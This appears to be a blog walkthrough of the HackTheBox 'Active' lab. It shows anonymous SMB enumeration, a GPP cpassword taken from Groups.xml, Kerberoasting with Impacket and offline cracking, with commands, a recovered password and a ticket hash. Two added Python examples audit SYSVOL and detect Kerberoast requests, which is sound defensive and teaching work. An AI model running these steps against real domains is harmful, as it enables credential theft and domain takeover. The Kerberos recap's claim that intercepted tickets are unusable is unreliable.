HackTheBox: Active Walkthrough

Sanaullah Aman Korai
7 min read · Jul 7, 2023

Active was an example of an easy box that still provided a lot of opportunity to learn. The box was centered around common vulnerabilities associated with Active Directory. It is a good opportunity to practice SMB enumeration, and it also gives you the chance to use Kerberoasting against a Windows domain, which, if you’re not a pentester, you may not have had the chance to do before.

First things first: let’s run an nmap scan on the box to see which ports are open and which services are running on them.

Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-07 03:07 EDT
Nmap scan report for 10.10.10.100
Host is up (0.21s latency).
Not shown: 982 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-07-07 07:07:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2023-07-07T07:08:46
|_ start_date: 2023-07-07T07:05:01
|_clock-skew: -1s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.09 seconds

Open ports that look interesting:

53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-07-07 07:07:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?

We have a lot of information from the nmap scan.

Enumeration

The nmap scan discloses the machine’s domain name, active.htb, so let’s add it to our hosts file.

echo "10.10.10.100  active.htb" >> /etc/hosts

The first thing I’m going to try to enumerate is DNS. Let’s use nslookup to learn more information about this domain.

nslookup                                   
> 10.10.10.100
;; communications error to 192.168.239.2#53: timed out
** server can't find 100.10.10.10.in-addr.arpa: NXDOMAIN
>

It timed out, so no luck there. Now let’s try a zone transfer.

host -l active.htb 10.10.10.100
Using domain server:
Name: 10.10.10.100
Address: 10.10.10.100#53
Aliases:

Host active.htb not found: 5(REFUSED)
; Transfer failed.

So we’ll move on to enumerating SMB on ports 139 and 445. We’ll start by listing the SMB shares. For that I will be using the smbmap tool; I have found it very useful for enumerating SMB shares.

smbmap -H active.htb

We have found a share, “Replication”, whose contents can be read without any authentication. Let’s log in and view the files in this share.

smbclient //active.htb/Replication -N

-N: suppresses the password prompt, since we’re logging in anonymously

We’re in!

After looking through the share, I found Groups.xml in the following directory.

cd Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\

Now download the file and see what information it contains.

get Groups.xml

cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

We have a username, “active.htb\SVC_TGS”, and an encrypted password (the cpassword attribute) that will allow us to gain an initial foothold.

The cpassword value is encrypted with AES, which is a strong encryption algorithm in itself. However, since the key is posted publicly online, we can easily decrypt the encrypted password.

There’s a simple Ruby program, gpp-decrypt, that uses the publicly disclosed key to decrypt any given GPP-encrypted string. It is included in a default installation of Kali.

Let’s use it to decrypt the password we found.
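The defender-side counterpart to this step, added here as an example (it is not code from the writeup, from gpp-decrypt or from any other tool named on the page): a stdlib-only Python audit that walks a SYSVOL tree (or an offline copy of it) and reports every Group Policy Preference XML item that still carries a cpassword attribute, so the item can be deleted. Microsoft’s MS14-025 update stopped GPP from writing new cpassword values, but files created before it stay in SYSVOL until someone removes them. The script deliberately decrypts nothing and never prints the blob. The Groups.xml sample is the one pulled from the Replication share above; the ScheduledTasks.xml and Drives.xml samples, their GUIDs and the account name backup_svc are constructed.

```python
"""Audit Group Policy Preference (GPP) XML files in SYSVOL for stored cpassword values.

Added example, not part of the original writeup and not the code of any tool it names.
It reports where a cpassword attribute is stored so the item can be removed; it never
decrypts anything and uses only the standard library.
"""
import os
import tempfile
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List

# Attribute naming the account a stored password belongs to, per GPP file type:
# Groups/DataSources/Drives/Printers use userName, ScheduledTasks uses runAs,
# Services uses accountName.
ACCOUNT_ATTRS = ("userName", "runAs", "accountName")

# Sample 1: the Groups.xml found in the Replication share (copied from the writeup).
SAMPLE_GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>"""

# Sample 2: a constructed ScheduledTasks.xml; GUIDs, account and blob are placeholders.
SAMPLE_TASKS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks clsid="{00000000-0000-0000-0000-0000000000AA}"><Task clsid="{00000000-0000-0000-0000-0000000000AB}" name="Nightly backup" changed="2018-07-18 20:50:00" uid="{00000000-0000-0000-0000-000000000001}"><Properties action="C" name="Nightly backup" runAs="active.htb\backup_svc" cpassword="CONSTRUCTED_PLACEHOLDER_BLOB"/></Task>
</ScheduledTasks>"""

# Sample 3: a constructed Drives.xml with no stored credential (must yield no finding).
SAMPLE_CLEAN_DRIVES_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Drives clsid="{00000000-0000-0000-0000-0000000000AC}"><Drive clsid="{00000000-0000-0000-0000-0000000000AD}" name="H:" changed="2018-07-18 20:55:00" uid="{00000000-0000-0000-0000-000000000002}"><Properties action="U" path="\\dc\home" label="Home" persistent="1" useLetter="1" letter="H"/></Drive>
</Drives>"""


@dataclass
class Finding:
    path: str           # file the cpassword was found in
    item: str           # GPP item type (User, Task, NTService, ...)
    account: str        # account the stored password belongs to
    changed: str        # 'changed' timestamp of the item, if present
    cpassword_len: int  # length of the base64 blob (the blob itself is never reported)


def find_gpp_passwords(xml_text: str, path: str) -> List[Finding]:
    """Return one Finding per non-empty cpassword attribute in a GPP XML document."""
    findings: List[Finding] = []
    try:
        root = ET.fromstring(xml_text.encode("utf-8"))
    except ET.ParseError:
        return findings  # not well-formed XML, nothing to report
    # cpassword lives on a <Properties> child; the item metadata is on its parent.
    for parent in root.iter():
        for child in parent:
            cpassword = child.attrib.get("cpassword", "")
            if not cpassword:
                continue
            account = next((child.attrib[a] for a in ACCOUNT_ATTRS if a in child.attrib), "<unknown>")
            findings.append(Finding(path=path, item=parent.tag, account=account,
                                    changed=parent.attrib.get("changed", ""),
                                    cpassword_len=len(cpassword)))
    return findings


def scan_sysvol(sysvol_root: str) -> List[Finding]:
    """Walk a SYSVOL tree (or an offline copy) and audit every XML file under it."""
    findings: List[Finding] = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            if name.lower().endswith(".xml"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8-sig") as fh:  # tolerate a UTF-8 BOM
                    findings.extend(find_gpp_passwords(fh.read(), full))
    return findings


def demo() -> List[Finding]:
    """Build a throwaway SYSVOL-like tree from the three samples and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        prefs = os.path.join(tmp, "Policies", "{31B2F340-016D-11D2-945F-00C04FB984F9}",
                             "MACHINE", "Preferences")
        for sub, text in (("Groups", SAMPLE_GROUPS_XML), ("ScheduledTasks", SAMPLE_TASKS_XML),
                          ("Drives", SAMPLE_CLEAN_DRIVES_XML)):
            os.makedirs(os.path.join(prefs, sub), exist_ok=True)
            with open(os.path.join(prefs, sub, sub + ".xml"), "w", encoding="utf-8") as fh:
                fh.write(text)
        return scan_sysvol(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f"{f.path}: {f.item} item for {f.account} (changed {f.changed}, "
              f"cpassword {f.cpassword_len} chars) - delete this GPP item")
```

Point scan_sysvol at \\<dc>\SYSVOL\<domain>\Policies (mounted read-only) or at a copy of it; every finding is a credential that any domain user can read, exactly as the anonymous Replication share exposed SVC_TGS here, and the fix is to delete the item and rotate the account’s password.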

From the Groups.xml file, we know that the username is SVC_TGS. This is probably not the admin user, but regardless let’s try to access the ADMIN$ share with the username/password we found.

It doesn’t work. Let’s try the Users share.

cd \SVC_TGS\Desktop\
get user.txt

cat user.txt
7117a97bb6d0………

We compromised a low privileged user. Now we need to escalate privileges.

Since we are dealing with Active Directory, a quick recap of Kerberos is in order. Kerberos is a network authentication protocol used to securely authenticate users to network services. It is ticket-based, which means that users are authenticated by presenting a ticket issued by a trusted authority.

The three main components of Kerberos are:

  • The Key Distribution Center (KDC): The KDC is the central authority that issues tickets and manages the Kerberos database.
  • The Authentication Service (AS): The AS is responsible for issuing ticket-granting tickets (TGTs) to users.
  • The Ticket Granting Service (TGS): The TGS is responsible for issuing service tickets for specific services.

Here is an example of how Kerberos works:

  1. A user wants to access a network service.
  2. The user’s computer sends a request to the KDC.
  3. The KDC issues a ticket to the user.
  4. The user’s computer sends the ticket to the service.
  5. The service verifies the ticket and grants the user access.

Kerberos is a secure protocol because it uses encryption to protect the tickets. This means that even if an attacker intercepted a ticket, they would not be able to use it to authenticate themselves to the service.

Kerberos is a widely used protocol and is supported by many operating systems and applications. It is a key component of many enterprise security solutions.

Here is an image that summarizes the Kerberos authentication process:

If you compromise a user that has a valid Kerberos ticket-granting ticket (TGT), you can request one or more ticket-granting service (TGS) service tickets for any Service Principal Name (SPN) from a domain controller. An example SPN would be the Application Server shown in the above figure.

A portion of the TGS ticket is encrypted with the password hash of the service account associated with the SPN. That encrypted portion can therefore be brute-forced offline to recover the service account password. So if an SPN is registered to the administrator account and the administrator is using a weak password, we’ll be able to crack it!

To do that, download Impacket, a collection of Python classes for working with network protocols.

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket/
python setup.py install #install software

The /examples folder contains a script called GetUserSPNs.py that finds SPNs associated with user accounts. With the -request flag it also outputs the TGS tickets it requested for those SPNs.

Run the script using the SVC_TGS credentials we found.

./GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-07-07 03:06:18.670972

[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$139d7c6ddd9411ec4279b34c76960ad5$…

We were able to request a TGS ticket for an SPN registered to the Administrator account. If we can crack it, we’ll be able to escalate privileges!

Note: If you get “Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)”, it’s probably because the attack machine’s date and time are not in sync with the Kerberos server.
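What the request above looks like from the domain controller’s side, as an added example (not code from the writeup or from Impacket): every service ticket the KDC issues is logged as Windows Security event 4769. A Kerberoast request is a successful 4769 whose TicketEncryptionType is RC4-HMAC (0x17, the same encryption type as the “23” in the $krb5tgs$23$ line above) for a ServiceName that is a user account rather than a computer account; in the output above the SPN active/CIFS:445 resolves to the Administrator user. The log lines below are constructed to mimic a flattened 4769 export: the field names follow the real event schema, but the requester address, the sqlsvc account and the failed request are made up.

```python
"""Spot Kerberoasting in Windows Security event 4769 (service ticket requested).

Added example, not part of the original writeup and not Impacket code. A Kerberoast
request shows up as a successful 4769 in which the ticket was issued with RC4-HMAC
(TicketEncryptionType 0x17, etype 23 in the $krb5tgs$23$ hash format) for a service
running under a user account rather than a computer account. The log is constructed.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple

RC4_ETYPES = {"0x17", "0x18"}   # RC4-HMAC and RC4-HMAC-EXP
SUCCESS = "0x0"                 # 4769 Status when a ticket was actually issued

# Constructed flattened 4769/4768 export; the 10.10.14.5 requester and sqlsvc are invented.
SAMPLE_4769_LOG = """\
EventID=4769 TargetUserName=DC$@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 IpAddress=::ffff:10.10.10.100 Status=0x0
EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 IpAddress=::ffff:10.10.14.5 Status=0x0
EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=::ffff:10.10.14.5 Status=0x0
EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 IpAddress=::ffff:10.10.14.5 Status=0x0
EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=sqlsvc TicketEncryptionType=0x17 IpAddress=::ffff:10.10.14.5 Status=0x1b
EventID=4768 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:10.10.14.5 Status=0x0
"""


def parse_kv_line(line: str) -> Dict[str, str]:
    """Split a 'key=value key=value' line into a dict (values carry no spaces here)."""
    fields: Dict[str, str] = {}
    for token in line.split():
        if "=" in token:
            key, value = token.split("=", 1)
            fields[key] = value
    return fields


def is_kerberoast_request(ev: Dict[str, str]) -> bool:
    """True if a parsed 4769 has the Kerberoast shape: issued, RC4, user-account service."""
    if ev.get("EventID") != "4769" or ev.get("Status") != SUCCESS:
        return False
    service = ev.get("ServiceName", "")
    # Computer accounts (trailing $) and the TGT service itself are not roastable targets.
    if not service or service.endswith("$") or service.lower() == "krbtgt":
        return False
    return ev.get("TicketEncryptionType", "").lower() in RC4_ETYPES


@dataclass
class Alert:
    requester: str        # account that asked for the tickets
    source_ip: str        # address the requests came from
    services: List[str]   # user-account services it obtained RC4 tickets for


def detect_kerberoast(log_text: str) -> List[Alert]:
    """Group suspicious requests by requester and source; many services at once is the classic pattern."""
    grouped: Dict[Tuple[str, str], List[str]] = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_kv_line(line)
        if is_kerberoast_request(ev):
            key = (ev.get("TargetUserName", "?"), ev.get("IpAddress", "?"))
            grouped[key].append(ev["ServiceName"])
    return [Alert(requester=user, source_ip=ip, services=sorted(svcs))
            for (user, ip), svcs in sorted(grouped.items())]


def hash_etype(krb5tgs_line: str) -> int:
    """Read the etype number out of a $krb5tgs$<etype>$... line so a cracked-hash
    format can be tied back to TicketEncryptionType (23 decimal is 0x17, RC4-HMAC)."""
    parts = krb5tgs_line.split("$")
    if len(parts) < 3 or parts[1] != "krb5tgs":
        raise ValueError("not a $krb5tgs$ hash line")
    return int(parts[2])


if __name__ == "__main__":
    for alert in detect_kerberoast(SAMPLE_4769_LOG):
        print(f"[!] {alert.requester} from {alert.source_ip} pulled RC4 service tickets for: "
              + ", ".join(alert.services))
    print("etype in the hash above:",
          hex(hash_etype("$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$")))
```

One caveat for anyone running this rule on a real domain: a service account with no AES keys configured (msDS-SupportedEncryptionTypes unset) is issued RC4 tickets legitimately, so on an unhardened domain the rule is noisy. Once service accounts have AES enabled and long random or gMSA-managed passwords, 0x17 requests for user accounts become rare and high-signal, and the offline cracking step that follows stops being practical.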

Now that we have a valid TGS ticket that is already in John the Ripper format (saved here as admin.txt), let’s try to crack it.

john --wordlist=/usr/share/wordlists/rockyou.txt admin.txt

To log in as the administrator, we’ll use another Impacket script, psexec.py; its help menu shows the command syntax for running it with the cracked credentials.

Navigate to the directory that contains the root.txt flag.

cd C:\Users\Administrator\Desktop

View the content of the flag.

Stay tuned for the next writeup!
